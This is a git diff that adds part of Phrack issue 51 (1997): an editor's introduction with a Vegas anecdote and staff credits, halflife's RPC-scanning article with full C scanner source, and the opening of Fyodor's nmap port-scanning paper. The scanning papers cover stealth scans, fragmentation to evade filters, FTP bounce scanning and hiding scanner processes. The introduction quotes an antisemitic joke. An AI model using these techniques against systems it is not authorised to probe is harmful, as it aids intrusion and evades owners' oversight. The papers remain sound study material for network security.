+FREE money.  What more can anymore ask for?!@  Sex?  Gluttony?  Corruption?
+Greed?  Thin facades?  Tackiness?  Friends, it's _all_ there.
+
+    Vegas is certainly not for everyone.  It's not for the timid, the shy or 
+the compulsive.  Vegas can and will eat you alive, if you are not careful.  
+Even the most vigilant often find themselves victimized by Sin City...  As I 
+write this paragraph, my memory draws me back...  back to that first week in 
+July 1997, towards the end of DefCon V, when a good friend and seasoned Vegas
+adventurer came knocking on my door at half past 5am...  
+
+    He was armed with a coke in one hand, a whiskey in the other.  The fact
+that he was noticely unencumbered by money caught my eye.  The Casino Demons 
+had relieved him of that.  He was in need of a safe place to camp for a few 
+hours...  I happily obliged.  I attempted to make his stay with us as 
+comfortable as possible...  However, my friend refused all attempts at 
+hospitality.  He was still deep in the throes of what professional Vegas 
+travelers call 'The Zone'.  He was in a dull haze, a casino-atmosphere-induced 
+catatonic state, in which external stimuli are, for the most part, ignored.  
+There was little I could do for him, so I bedded down...  And there he sat, 
+engulfed in darkness, deep within his own world...  Eventually, exhaustion 
+overcame him, and he drifted into an uncomfortable sleep...  Early in the
+morning, he arose, determined to retake his reappropriated wealth.  
+
+    It took me a few tries of getting raped by that town before I realized how 
+it works, and, more importantly, how to work it.
+    
+    It can be summed up in one word.  An abbreviation even.  COMPS.  Vegas is 
+all about being compensated for.  Compensation for being in out in the fucking 
+desert.  Compensation for staying in some shitty hotel.  Compensation for 
+winning some of their money.  Compensation for losing ALL of your money.  
+Learning how to have a good time in Vegas means learning how to get comped.
+In order to be comped, you must either a) be some one important, b) know 
+someone important, or the most common occurrence, c) comp other people.
+
+    This past DefCon, I had my room upgraded from a single-bed room on the
+first floor, to a double-bed on the second, and then from that to a $400/nite 
+suite somewhere up in the 20's (you know, the kind with the double doors).
+It's all about knowing how to work the system.  Knowing how to get comped.
+Complaining about something is often a good way to get something for free in
+Vegas.  So is being put out in some fashion or another.  Go ahead and watch 
+Casino and Swingers a few dozen times and you will get the idea...
+
+
+    A word about this issue.  In my opinion, and the opinion of many people
+way cooler then me, this is the Best Phrack Issue Ever (TM).  Ok.  Now.  In
+Issue 48, I know I promised timely dissemination.  However, I am an older / 
+wiser Phrack editor now, and, what it comes down to, is that timeliness is not 
+always possible.  Not when there is a minimum level of excellence that must be 
+preserved.  This issue is a perfect example of that phenomena.  We have 
+amassed some seriously cool shit this time around.  Technical excellence 
+abounds here, and if we are a few weeks late, I think it should be well worth
+the wait.  We've got several ground breaking articles, a great deal of source, 
+fully nude photos of Milla Jovovich (not available in ASCII-Phrack) and a new
+format.  Commentary, as always, is appreciated.
+
+    What makes this (or any) issue so damned good?  Simple.  The incredible
+array of talented individuals that graciously lend their time to writing
+articles for us.  I just want to give a word of thanks to you guys: past, 
+present and future.  Without you, Phrack would slip quietly into the night...  
+This issue, a special werdup to halflife for the technically superior work
+he contributed for P51, thrice over.
+
+    Phrack 51 comes atcha power-packed with new streamlined formatting!  We
+cut out colons, added a surplus of dashes and brackets, and b00m!  Less fluff,
+more EDGE.  Areodynamicphrack.  Europhrack.  _Slickphrack_.
+
+Bad to the bone and shot to the heart when you think about Phrack, you touch 
+yourself.
+
+Enjoy the magazine.  It is for and by the hacking community.  Period.
+
+PS
+
+The aforementioned gamblaholic ended up being comped three $20 meals, and a 
+show (Lance Burton at the Monte Carlo).  Man, that lucky son-of-a-bitch got to 
+see Lance at the Carlo...
+
+   
+-- Editor in Chief ------------[  route
+-- Nominal Editors ------------[  datastream cowboy, alhambra
+-- We've given up hope --------[  voyager
+-- Phrack World News ----------[  disorder
+-- Phrack Webpage Sloth -------[  loadammo
+-- Most Likely To Be Beaten ---|
+-- About the Head and Neck by -|
+-- Xanax ----------------------[  Nicki Jarecki
+-------- Elite ---------------->  omerta
+-- Number One Crush -----------[  Milla Jovovich
+-- Extra Special Thanks -------[  halflife
+-- The Man on The Inside ------[  varak
+-- Gas Face Given -------------[  "Lunatic Unix with Tunics"
+-- Got owned?  Shoulda used ---[  OpenBSD
+-- Shout Outs -----------------[  The Guild, r00t, The Death Vegetable, Swamp 
+                                  Ratte, prym, maverick, Cantor, nirva, The 
+                                  Army of the Twelve Monkeys, guyver, mycroft, 
+                                  Asriel, Theo Deraadt, X, Torquie, mudge.
+
+Phrack Magazine V. 7, #51, September 01, 1997.  ISSN 1068-1035
+Contents Copyright (c) 1996/7 Phrack Magazine. All Rights Reserved.  Nothing 
+may be reproduced in whole or in part without written permission from the
+editor in chief.  Phrack Magazine is made available quarterly to the public, 
+free of charge.  Go nuts people.  
+
+
+Subscription requests, articles, comments, whatever should be directed to:
+
+                phrackedit@phrack.com
+
+Submissions to the above email address may be encrypted with the following key:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6.2
+
+mQENAzMgU6YAAAEH/1/Kc1KrcUIyL5RBEVeD82JM9skWn60HBzy25FvR6QRYF8uW
+ibPDuf3ecgGezQHM0/bDuQfxeOXDihqXQNZzXf02RuS/Au0yiILKqGGfqxxP88/O
+vgEDrxu4vKpHBMYTE/Gh6u8QtcqfPYkrfFzJADzPEnPI7zw7ACAnXM5F+8+elt2j
+0njg68iA8ms7W5f0AOcRXEXfCznxVTk470JAIsx76+2aPs9mpIFOB2f8u7xPKg+W
+DDJ2wTS1vXzPsmsGJt1UypmitKBQYvJrrsLtTQ9FRavflvCpCWKiwCGIngIKt3yG
+/v/uQb3qagZ3kiYr3nUJ+ULklSwej+lrReIdqYEABRG0GjxwaHJhY2tlZGl0QGlu
+Zm9uZXh1cy5jb20+tA9QaHJhY2sgTWFnYXppbmU=
+=1iyt
+-----END PGP PUBLIC KEY BLOCK-----   
+                                    
+As always, ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED.  Phrack goes out 
+plaintext.  You certainly can subscribe in plaintext.
+
+
+-------------------------[  T A B L E   O F   C O N T E N T S
+
+ 1 Introduction                                            Phrack Staff    9K
+ 2 Phrack Loopback				           Phrack Staff   45K
+ 3 Line Noise				                   various        71K 
+ 4 Phrack Prophile on Swamp Ratte                          Phrack Staff   14K
+ 5 File Descriptor Hijacking                               orabidoo       20K
+ 6 LOKI2 (the implementation)                              route         111K
+ 7 Juggernaut 1.0 - 1.2 patchfile                          route          11K
+ 8 Shared Library Redirection                              halflife        7K
+09 Bypassing Integrity Checking Systems                    halflife       11K
+10 Stealth RPC scanning                                    halflife        7K
+11 The Art of Scanning                                     fyodor         87K
+12 The Eternity Service                                    Adam Back     118K
+13 Monoalphabetic cipher cryptanalysis                     mythrandir     16K
+14 Phrack Magazine Article Index Guide                     guyver        100K
+15 A Brief introduction to CCS7                            Narbo          10K  
+16 Phrack World News                                       Disorder       83K
+17 extract.c                                               Phrack Staff    3K
+
+                                                                         723K
+
+-----------------------------------------------------------------------------
+ 
+"...Who's the big winner tonight...?  Mikey!  Mikey wins!  Mikey's the big
+    winner...!"
+    - Trent "Double Down" (Vince Vaughn)
+
+
+*jtb* phrack's like wine, it gets better with age
+*jtb* as opposed to, like, decomposing.
+
+
+"...Daddy needs a new pair of Jews..."
+        - loadammo, clamping a mighty hand down upon my shoulder and a mighty
+          hand down upon alhambras shoulder, Blackjack Tables, DefCon V, Las 
+          Vegas, NV.
+
+-----------------------------------------------------------------------------
+
+----[  EOF
diff --git a/phrack51/10.txt b/phrack51/10.txt
new file mode 100644
index 0000000..35f0ada
--- /dev/null
+++ b/phrack51/10.txt
@@ -0,0 +1,280 @@
+---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 10 of 17
+
+
+-------------------------[  Scanning for RPC Services
+
+
+--------[  halflife <halflife@infonexus.com>
+
+
+Remote Procedure Language is a specification for letting procedures be
+executable on remote machines.  It is defined in rfc1831.  It has a number of 
+good traits, and if you run SunOS or Solaris, you are almost required to make 
+use of it to some degree.
+
+Unfortunately, there are vulnerabilities in some RPC services that have
+caused many machines to be penetrated.  Many administrators block access to 
+portmapper (port 111) in an effort to deny external users access to their weak 
+RPC services.
+
+Unfortunately, this is completely inadequate.  This article details how 
+trivial it is to do a scan for specific RPC program numbers.  The scan can be 
+performed relatively quickly, and in many cases will not be logged.
+
+First, a little information about RPC itself; when I refer to RPC, I am only 
+referring to ONC RPC, and not DCE RPC.  RPC is a query/reply-based system. You 
+send an initial query with the program number you are interested in, the 
+procedure number, any arguments, authentication, and other needed parameters. 
+In response, you get whatever the procedure returns, and some indication of 
+the reason for the failure if it failed.
+
+Since RPC was designed to be portable, all arguments must be translated into 
+XDR.  XDR is a data encoding language that superficially reminds me a little 
+bit of Pascal (at least, as far as strings are concerned). If you want more 
+information on XDR, it is defined in rfc1832.
+
+As you probably surmised by now, RPC programs are made up of various 
+procedures.  There is one procedure that always exists, it is procedure 0. 
+This procedure accepts no arguments, and it does not return any value (think 
+void rpcping(void)).  This is how we will determine if a given port holds a 
+given program, we will call the ping procedure!
+
+So now we have a basic idea on how to determine if a given port is running
+a given RPC program number.  Next we need to determine which UDP ports are
+listening.  This can be done a number of ways, but the way I am using is
+to connect() to the port and try write data.  If nothing is there, we
+will (hopefully) get a PORT_UNREACH error in errno, in which case we know
+there is nothing on that port.
+
+In the given code, we do a udp scan, and for every listening udp port, we
+try to query the ping procedure of the program number we are scanning for.
+If we get a positive response, the program number we are looking for exists
+on that port and we exit.
+
+<++> RPCscan/Makefile
+CC=gcc
+PROGNAME=rpcscan
+CFLAGS=-c
+
+build: checkrpc.o main.o rpcserv.o udpcheck.o
+	$(CC) -o $(PROGNAME) checkrpc.o main.o rpcserv.o udpcheck.o
+
+checkrpc.o:
+	$(CC) $(CFLAGS) checkrpc.c
+
+main.o:
+	$(CC) $(CFLAGS) main.c
+
+rpcserv.o:
+	$(CC) $(CFLAGS) rpcserv.c
+
+udpcheck.o:
+	$(CC) $(CFLAGS) udpcheck.c
+
+clean:
+	rm -f *.o $(PROGNAME)
+<-->
+<++> RPCscan/checkrpc.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/time.h>
+#include <sys/socket.h>
+#include <rpc/rpc.h>
+#include <netdb.h>
+
+extern struct sockaddr_in *saddr;
+
+int
+check_rpc_service(long program)
+{
+	int sock = RPC_ANYSOCK;
+	CLIENT *client;
+	struct timeval timeout;
+	enum clnt_stat cstat;
+
+	timeout.tv_sec = 10;
+	timeout.tv_usec = 0;
+	client = clntudp_create(saddr, program, 1, timeout, &sock);
+	if(!client)
+		return -1;
+	timeout.tv_sec = 10;
+	timeout.tv_usec = 0;
+	cstat = RPC_TIMEDOUT;
+	cstat = clnt_call(client, 0, xdr_void, NULL, xdr_void, NULL, timeout);
+	if(cstat == RPC_TIMEDOUT)
+	{
+		timeout.tv_sec = 10;
+		timeout.tv_usec = 0;
+		cstat = clnt_call(client, 0, xdr_void, NULL, xdr_void, NULL, timeout);
+	}
+	clnt_destroy(client);
+	close(sock);
+	if(cstat == RPC_SUCCESS)
+		return 1;
+	else if(cstat == RPC_PROGVERSMISMATCH)
+		return 1;
+	else return 0;
+}
+<-->
+<++> RPCscan/main.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+int check_udp_port(char *, u_short);
+int check_rpc_service(long);
+long get_rpc_prog_number(char *);
+#define HIGH_PORT	5000
+#define LOW_PORT	512	
+
+main(int argc, char **argv)
+{
+	int i,j;
+	long prog;
+	if(argc != 3)
+	{
+		fprintf(stderr, "%s host program\n", argv[0]);
+		exit(0);
+	}
+	prog = get_rpc_prog_number(argv[2]);
+	if(prog == -1)
+	{
+		fprintf(stderr, "invalid rpc program number\n");
+		exit(0);
+	}
+	printf("Scanning %s for program %d\n", argv[1], prog);
+	for(i=LOW_PORT;i <= HIGH_PORT;i++)
+	{
+		if(check_udp_port(argv[1], i) > 0)
+		{
+			if(check_rpc_service(prog) == 1)
+			{
+				printf("%s is on port %u\n", argv[2], i);
+				exit(0);
+			}
+		}
+	}
+}
+<-->
+<++> RPCscan/rpcserv.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <ctype.h>
+#include <rpc/rpc.h>
+
+long
+get_rpc_prog_number(char *progname)
+{
+	struct rpcent *r;
+	int i=0;
+
+	while(progname[i] != '\0')
+	{
+		if(!isdigit(progname[i]))
+		{
+			setrpcent(1);
+			r = getrpcbyname(progname);
+			endrpcent();
+			if(!r)
+				return -1;
+			else return r->r_number;
+		}
+		i++;
+	}
+	return atoi(progname);
+}
+<-->
+<++> RPCscan/udpcheck.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/param.h>
+#include <sys/time.h>
+#include <sys/errno.h>
+extern int h_errno;
+
+struct sockaddr_in *saddr = NULL;
+
+int
+check_udp_port(char *hostname, u_short port)
+{
+	int s, i, sr;
+	struct hostent *he;
+	fd_set rset;
+	struct timeval tv;
+
+	if(!saddr)
+	{
+		saddr = malloc(sizeof(struct sockaddr_in));
+		if(!saddr) return -1;
+
+		saddr->sin_family = AF_INET;
+		saddr->sin_addr.s_addr = inet_addr(hostname);
+		if(saddr->sin_addr.s_addr == INADDR_NONE)
+		{
+			sethostent(1);
+			he = gethostbyname(hostname);
+			if(!he)
+			{
+				herror("gethostbyname");
+				exit(1);
+			}
+			if(he->h_length <= sizeof(saddr->sin_addr.s_addr))
+				bcopy(he->h_addr, &saddr->sin_addr.s_addr, he->h_length);
+			else
+				bcopy(he->h_addr, &saddr->sin_addr.s_addr, sizeof(saddr->sin_addr.s_addr));
+			endhostent();
+		}
+	}
+	saddr->sin_port = htons(port);
+	s = socket(AF_INET, SOCK_DGRAM, 0);
+	if(s < 0)
+	{
+		perror("socket");
+		return -1;
+	}
+	i = connect(s, (struct sockaddr *)saddr, sizeof(struct sockaddr_in));
+	if(i < 0)
+	{
+		perror("connect");
+		return -1;
+	}
+	for(i=0;i < 3;i++)
+	{
+		write(s, "", 1);
+		FD_ZERO(&rset);
+		FD_SET(s, &rset);
+		tv.tv_sec = 5;
+		tv.tv_usec = 0;
+		sr = select(s+1, &rset, NULL, NULL, &tv);
+		if(sr != 1)
+			continue;
+		if(read(s, &sr, sizeof(sr)) < 1)
+		{
+			close(s);
+			return 0;
+		}
+		else
+		{
+			close(s);
+			return 1;
+		}
+	}
+	close(s);
+	return 1;
+}
+<-->
+
+
+----[  EOF
+
+
diff --git a/phrack51/11.txt b/phrack51/11.txt
new file mode 100644
index 0000000..d0f07d3
--- /dev/null
+++ b/phrack51/11.txt
@@ -0,0 +1,2493 @@
+---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 11 of 17
+
+
+-------------------------[  The Art of Port Scanning
+
+
+--------[  Fyodor <fyodor@dhp.com>
+
+
+[ Abstract ]
+
+This paper details many of the techniques used to determine what ports (or
+similar protocol abstraction) of a host are listening for connections.  These 
+ports represent potential communication channels.  Mapping their existence
+facilitates the exchange of information with the host, and thus it is quite 
+useful for anyone wishing to explore their networked environment, including 
+hackers.  Despite what you have heard from the media, the Internet is NOT
+all about TCP port 80.  Anyone who relies exclusively on the WWW for
+information gathering is likely to gain the same level of proficiency as your 
+average AOLer, who does the same.  This paper is also meant to serve as an
+introduction to and ancillary documentation for a coding project I have been 
+working on.  It is a full featured, robust port scanner which (I hope) solves 
+some of the problems I have encountered when dealing with other scanners and 
+when working to scan massive networks.  The tool, nmap, supports the following:
+
+    - vanilla TCP connect() scanning, 
+    - TCP SYN (half open) scanning,
+    - TCP FIN (stealth) scanning, 
+    - TCP ftp proxy (bounce attack) scanning
+    - SYN/FIN scanning using IP fragments (bypasses packet filters),
+    - UDP recvfrom() scanning, 
+    - UDP raw ICMP port unreachable scanning, 
+    - ICMP scanning (ping-sweep), and
+    - reverse-ident scanning.
+
+The freely distributable source code is appended to this paper.
+
+
+
+[ Introduction ]
+
+Scanning, as a method for discovering exploitable communication channels, has
+been around for ages.  The idea is to probe as many listeners as possible, and
+keep track of the ones that are receptive or useful to your particular need.
+Much of the field of advertising is based on this paradigm, and the "to current
+resident" brute force style of bulk mail is an almost perfect parallel to what
+we will discuss.  Just stick a message in every mailbox and wait for the
+responses to trickle back.
+
+Scanning entered the h/p world along with the phone systems.  Here we have this
+tremendous global telecommunications network, all reachable through codes on 
+our telephone.  Millions of numbers are reachable locally, yet we may only
+be interested in 0.5% of these numbers, perhaps those that answer with a 
+carrier.
+
+The logical solution to finding those numbers that interest us is to try them
+all.  Thus the field of "wardialing" arose.  Excellent programs like Toneloc
+were developed to facilitate the probing of entire exchanges and more.  The
+basic idea is simple.  If you dial a number and your modem gives you a CONNECT,
+you record it.  Otherwise the computer hangs up and tirelessly dials the next 
+one.
+
+While wardialing is still useful, we are now finding that many of the computers
+we wish to communicate with are connected through networks such as the Internet
+rather than analog phone dialups.  Scanning these machines involves the same
+brute force technique.  We send a blizzard of packets for various protocols,
+and we deduce which services are listening from the responses we receive (or
+don't receive).
+
+
+
+[ Techniques ]
+
+Over time, a number of techniques have been developed for surveying the
+protocols and ports on which a target machine is listening.  They all offer
+different benefits and problems.  Here is a line up of the most common:
+
+- TCP connect() scanning : This is the most basic form of TCP scanning.  The
+connect() system call provided by your operating system is used to open a
+connection to every interesting port on the machine.  If the port is listening,
+connect() will succeed, otherwise the port isn't reachable.  One strong
+advantage to this technique is that you don't need any special privileges.  Any
+user on most UNIX boxes is free to use this call.  Another advantage is speed.
+While making a separate connect() call for every targeted port in a linear
+fashion would take ages over a slow connection, you can hasten the scan by
+using many sockets in parallel.  Using non-blocking I/O allows you to set a low
+time-out period and watch all the sockets at once.  This is the fastest
+scanning method supported by nmap, and is available with the -t (TCP) option.
+The big downside is that this sort of scan is easily detectable and filterable.
+The target hosts logs will show a bunch of connection and error messages for
+the services which take the connection and then have it immediately shutdown.
+
+
+- TCP SYN scanning : This technique is often referred to as "half-open"
+scanning, because you don't open a full TCP connection.  You send a SYN packet,
+as if you are going to open a real connection and wait for a response.  A
+SYN|ACK indicates the port is listening.  A RST is indicative of a non-
+listener.  If a SYN|ACK is received, you immediately send a RST to tear down
+the connection (actually the kernel does this for us).  The primary advantage
+to this scanning technique is that fewer sites will log it.  Unfortunately you
+need root privileges to build these custom SYN packets.  SYN scanning is the -s
+option of nmap.
+
+
+- TCP FIN scanning : There are times when even SYN scanning isn't clandestine
+enough.  Some firewalls and packet filters watch for SYNs to an unallowed port,
+and programs like synlogger and Courtney are available to detect these scans.
+FIN packets, on the other hand, may be able to pass through unmolested.  This
+scanning technique was featured in detail by Uriel Maimon in Phrack 49, article
+15.  The idea is that closed ports tend to reply to your FIN packet with the
+proper RST.  Open ports, on the other hand, tend to ignore the packet in
+question.  This is a bug in TCP implementations and so it isn't 100% reliable
+(some systems, notably Micro$oft boxes, seem to be immune).  It works well on
+most other systems I've tried.  FIN scanning is the -U (Uriel) option of nmap.
+
+
+- Fragmentation scanning : This is not a new scanning method in and of itself,
+but a modification of other techniques.  Instead of just sending the probe
+packet, you break it into a couple of small IP fragments.  You are splitting 
+up the TCP header over several packets to make it harder for packet filters 
+and so forth to detect what you are doing.  Be careful with this!  Some
+programs have trouble handling these tiny packets.  My favorite sniffer
+segmentation faulted immediately upon receiving the first 36-byte fragment.  
+After that comes a 24 byte one!  While this method won't get by packet filters
+and firewalls that queue all IP fragments (like the CONFIG_IP_ALWAYS_DEFRAG 
+option in Linux), a lot of networks can't afford the performance hit this
+causes.  This feature is rather unique to scanners (at least I haven't seen 
+any others that do this).  Thanks to daemon9 for suggesting it.  The -f
+instructs the specified SYN or FIN scan to use tiny fragmented packets.
+
+
+- TCP reverse ident scanning : As noted by Dave Goldsmith in a 1996 Bugtraq
+post, the ident protocol (rfc1413) allows for the disclosure of the username of
+the owner of any process connected via TCP, even if that process didn't 
+initiate the connection.  So you can, for example, connect to the http port 
+and then use identd to find out whether the server is running as root.  This 
+can only be done with a full TCP connection to the target port (i.e. the -t
+option).  nmap's -i option queries identd for the owner of all listen()ing
+ports.
+
+
+- FTP bounce attack : An interesting "feature" of the ftp protocol (RFC 959) is
+support for "proxy" ftp connections.  In other words, I should be able to
+connect from evil.com to the FTP server-PI (protocol interpreter) of target.com
+to establish the control communication connection.  Then I should be able to
+request that the server-PI initiate an active server-DTP (data transfer
+process) to send a file ANYWHERE on the internet!  Presumably to a User-DTP,
+although the RFC specifically states that asking one server to send a file to
+another is OK.  Now this may have worked well in 1985 when the RFC was just
+written.  But nowadays, we can't have people hijacking ftp servers and
+requesting that data be spit out to arbitrary points on the internet.  As
+*Hobbit* wrote back in 1995, this protocol flaw "can be used to post virtually
+untraceable mail and news, hammer on servers at various sites, fill up disks,
+try to hop firewalls, and generally be annoying and hard to track down at the
+same time."  What we will exploit this for is to (surprise, surprise) scan TCP
+ports from a "proxy" ftp server.  Thus you could connect to an ftp server
+behind a firewall, and then scan ports that are more likely to be blocked (139
+is a good one).  If the ftp server allows reading from and writing to a
+directory (such as /incoming), you can send arbitrary data to ports that you do
+find open.
+
+For port scanning, our technique is to use the PORT command to declare that
+our passive "User-DTP" is listening on the target box at a certain port number.
+ Then we try to LIST the current directory, and the result is sent over the
+Server-DTP channel.  If our target host is listening on the specified port, the
+transfer will be successful (generating a 150 and a 226 response).  Otherwise
+we will get "425 Can't build data connection: Connection refused."  Then we
+issue another PORT command to try the next port on the target host.  The
+advantages to this approach are obvious (harder to trace, potential to bypass
+firewalls).  The main disadvantages are that it is slow, and that some FTP
+servers have finally got a clue and disabled the proxy "feature".  For what it
+is worth, here is a list of banners from sites where it does/doesn't work:
+
+*Bounce attacks worked:*
+
+220 xxxxxxx.com FTP server (Version wu-2.4(3) Wed Dec 14 ...) ready.
+220 xxx.xxx.xxx.edu FTP server ready.
+220 xx.Telcom.xxxx.EDU FTP server (Version wu-2.4(3) Tue Jun 11 ...) ready.
+220 lem FTP server (SunOS 4.1) ready.
+220 xxx.xxx.es FTP server (Version wu-2.4(11) Sat Apr 27 ...) ready.
+220 elios FTP server (SunOS 4.1) ready
+
+*Bounce attack failed:*
+
+220 wcarchive.cdrom.com FTP server (Version DG-2.0.39 Sun May 4 ...) ready.
+220 xxx.xx.xxxxx.EDU Version wu-2.4.2-academ[BETA-12](1) Fri Feb 7
+220 ftp Microsoft FTP Service (Version 3.0).
+220 xxx FTP server (Version wu-2.4.2-academ[BETA-11](1) Tue Sep 3 ...) ready.
+220 xxx.unc.edu FTP server (Version wu-2.4.2-academ[BETA-13](6) ...) ready.
+
+The 'x's are partly there to protect those guilty of running a flawed server,
+but mostly just to make the lines fit in 80 columns.  Same thing with the
+ellipse points.  The bounce attack is available with the -b <proxy_server>
+option of nmap.  proxy_server can be specified in standard URL format,
+username:password@server:port , with everything but server being optional.
+
+
+- UDP ICMP port unreachable scanning : This scanning method varies from the
+above in that we are using the UDP protocol instead of TCP.  While this
+protocol is simpler, scanning it is actually significantly more difficult.
+This is because open ports don't have to send an acknowledgement in response to
+our probe, and closed ports aren't even required to send an error packet.
+Fortunately, most hosts do send an ICMP_PORT_UNREACH error when you send a
+packet to a closed UDP port.  Thus you can find out if a port is NOT open, and
+by exclusion determine which ports which are.  Neither UDP packets, nor the
+ICMP errors are guaranteed to arrive, so UDP scanners of this sort must also
+implement retransmission of packets that appear to be lost (or you will get a
+bunch of false positives).  Also, this scanning technique is slow because of
+compensation for machines that took RFC 1812 section 4.3.2.8 to heart and limit
+ICMP error message rate.  For example, the Linux kernel (in net/ipv4/icmp.h)
+limits destination unreachable message generation to 80 per 4 seconds, with a
+1/4 second penalty if that is exceeded.  At some point I will add a better
+algorithm to nmap for detecting this.  Also, you will need to be root for
+access to the raw ICMP socket necessary for reading the port unreachable.  The
+-u (UDP) option of nmap implements this scanning method for root users.
+
+Some people think UDP scanning is lame and pointless.  I usually remind them of
+the recent Solaris rcpbind hole.  Rpcbind can be found hiding on an
+undocumented UDP port somewhere above 32770.  So it doesn't matter that 111 is
+blocked by the firewall.  But can you find which of the more than 30,000 high
+ports it is listening on?  With a UDP scanner you can!
+
+
+- UDP recvfrom() and write() scanning : While non-root users can't read
+port unreachable errors directly, Linux is cool enough to inform the user
+indirectly when they have been received.  For example a second write()
+call to a closed port will usually fail.  A lot of scanners such as netcat
+and Pluvius' pscan.c does this.  I have also noticed that recvfrom() on
+non-blocking UDP sockets usually return EAGAIN ("Try Again", errno 13) if
+the ICMP error hasn't been received, and ECONNREFUSED ("Connection refused", 
+errno 111) if it has.  This is the technique used for determining open ports 
+when non-root users use -u (UDP).  Root users can also use the -l (lamer
+UDP scan) options to force this, but it is a really dumb idea.
+
+
+- ICMP echo scanning : This isn't really port scanning, since ICMP doesn't have
+a port abstraction.  But it is sometimes useful to determine what hosts in a
+network are up by pinging them all.  the -P option does this.  Also you might
+want to adjust the PING_TIMEOUT #define if you are scanning a large
+network. nmap supports a host/bitmask notation to make this sort of thing
+easier.  For example 'nmap -P cert.org/24 152.148.0.0/16' would scan CERT's
+class C network and whatever class B entity 152.148.* represents.  Host/26 is
+useful for 6-bit subnets within an organization.
+
+
+
+[ Features ]
+
+Prior to writing nmap, I spent a lot of time with other scanners exploring the
+Internet and various private networks (note the avoidance of the "intranet"
+buzzword).  I have used many of the top scanners available today, including
+strobe by Julian Assange, netcat by *Hobbit*, stcp by Uriel Maimon, pscan by
+Pluvius, ident-scan by Dave Goldsmith, and the SATAN tcp/udp scanners by
+Wietse Venema.  These are all excellent scanners!  In fact, I ended up hacking
+most of them to support the best features of the others.  Finally I decided
+to write a whole new scanner, rather than rely on hacked versions of a dozen
+different scanners in my /usr/local/sbin.  While I wrote all the code, nmap
+uses a lot of good ideas from its predecessors.  I also incorporated some new
+stuff like fragmentation scanning and options that were on my "wish list" for
+other scanners.  Here are some of the (IMHO) useful features of nmap:
+
+- dynamic delay time calculations: Some scanners require that you supply a
+delay time between sending packets.  Well how should I know what to use?
+Sure, I can ping them, but that is a pain, and plus the response time of many
+hosts changes dramatically when they are being flooded with requests.  nmap
+tries to determine the best delay time for you.  It also tries to keep track
+of packet retransmissions, etc. so that it can modify this delay time during
+the course of the scan.  For root users, the primary technique for finding an
+initial delay is to time the internal "ping" function.  For non-root users, it
+times an attempted connect() to a closed port on the target.  It can also pick
+a reasonable default value.  Again, people who want to specify a delay
+themselves can do so with -w (wait), but you shouldn't have to.
+
+- retransmission: Some scanners just send out all the query packets, and
+collect the responses.  But this can lead to false positives or negatives in
+the case where packets are dropped.  This is especially important for
+"negative" style scans like UDP and FIN, where what you are looking for is a
+port that does NOT respond.  In most cases, nmap implements a configurable
+number of retransmissions for ports that don't respond.
+
+- parallel port scanning:  Some scanners simply scan ports linearly, one at a
+time, until they do all 65535.  This actually works for TCP on a very fast 
+local network, but the speed of this is not at all acceptable on a wide area 
+network like the Internet.  nmap uses non-blocking i/o and parallel scanning 
+in all TCP and UDP modes.  The number of scans in parallel is configurable
+with the -M (Max sockets) option.  On a very fast network you will actually 
+decrease performance if you do more than 18 or so.  On slow networks, high
+values increase performance dramatically.
+
+- Flexible port specification:  I don't always want to just scan all 65535
+ports.  Also, the scanners which only allow you to scan ports 1 - N sometimes 
+fall short of my need.  The -p option allows you to specify an arbitrary
+number of ports and ranges for scanning.  For example, '-p 21-25,80,113,
+60000-' does what you would expect (a trailing hyphen means up to 65536, a
+leading hyphen means 1 through).  You can also use the -F (fast) option, which
+scans all the ports registered in your /etc/services (a la strobe).
+
+- Flexible target specification:  I often want to scan more then one host,
+and I certainly don't want to list every single host on a large network to
+scan.  Everything that isn't an option (or option argument) in nmap is
+treated as a target host.  As mentioned before, you can optionally append
+/mask to a hostname or IP address in order to scan all hosts with the same
+initial <mask> bits of the 32 bit IP address.
+
+- detection of down hosts:  Some scanners allow you to scan large networks, but
+they waste a huge amount of time scanning 65535 ports of a dead host!  By
+default, nmap pings each host to make sure it is up before wasting time on it.
+It is also capable of bailing on hosts that seem down based on strange port
+scanning errors.  It is also meant to be tolerant of people who accidentally scan
+network addresses, broadcast addresses, etc.
+
+- detection of your IP address: For some reason, a lot of scanners ask you to
+type in your IP address as one of the parameters.  Jeez, I don't want to have
+to 'ifconfig' and figure out my current address every time I scan.  Of course,
+this is better then the scanners I've seen which require recompilation every
+time you change your address!  nmap first tries to detect your address during
+the ping stage.  It uses the address that the echo response is received on, as
+that is the interface it should almost always be routed through.  If it can't
+do this (like if you don't have host pinging enabled), nmap tries to detect
+your primary interface and uses that address.  You can also use -S to specify
+it directly, but you shouldn't have to (unless you want to make it look like
+someone ELSE is SYN or FIN scanning a host.
+
+
+Some other, more minor options:
+
+ -v (verbose): This is highly recommended for interactive use.  Among other
+useful messages, you will see ports come up as they are found, rather than
+having to wait for the sorted summary list.
+
+ -r (randomize): This will randomize the order in which the target host's
+ports are scanned.
+
+ -q (quash argv): This changes argv[0] to FAKE_ARGV ("pine" by default).
+It also eliminates all other arguments, so you won't look too suspicious in
+'w' or 'ps' listings.
+
+ -h for an options summary.
+
+Also look for http://www.dhp.com/~fyodor/nmap/, which is the web site I plan to
+put future versions and more information on.  In fact, you would be well
+advised to check there right now.
+
+
+[ Greets ]
+
+Of course this paper would not be complete without a shout out to all the 
+people who made it possible.
+
+* Congratulations to the people at Phrack for getting this thing going again!
+* Greets to the whole dc-stuff crew.
+* Greets to the STUPH, Turntec, L0pht, TACD, the Guild, cDc, and all the other
+  groups who help keep the scene alive.
+* Shout out to _eci for disclosing the coolest Windows bug in recent history.
+* Thanks to the Data Haven Project (dhp.com) admins for providing such great
+  service for $10/month.  
+* And a special shout out goes to all my friends.  You know who
+  you are and some of you (wisely) stay out of the spotlight, so I'll keep you
+  anonymous ... except of course for Ken and Jay, and Avenger, Grog, Cash
+  Monies, Ethernet Kid, Zos, JuICe, Mother Prednisone, and Karen.
+
+
+And finally, we get to ...
+
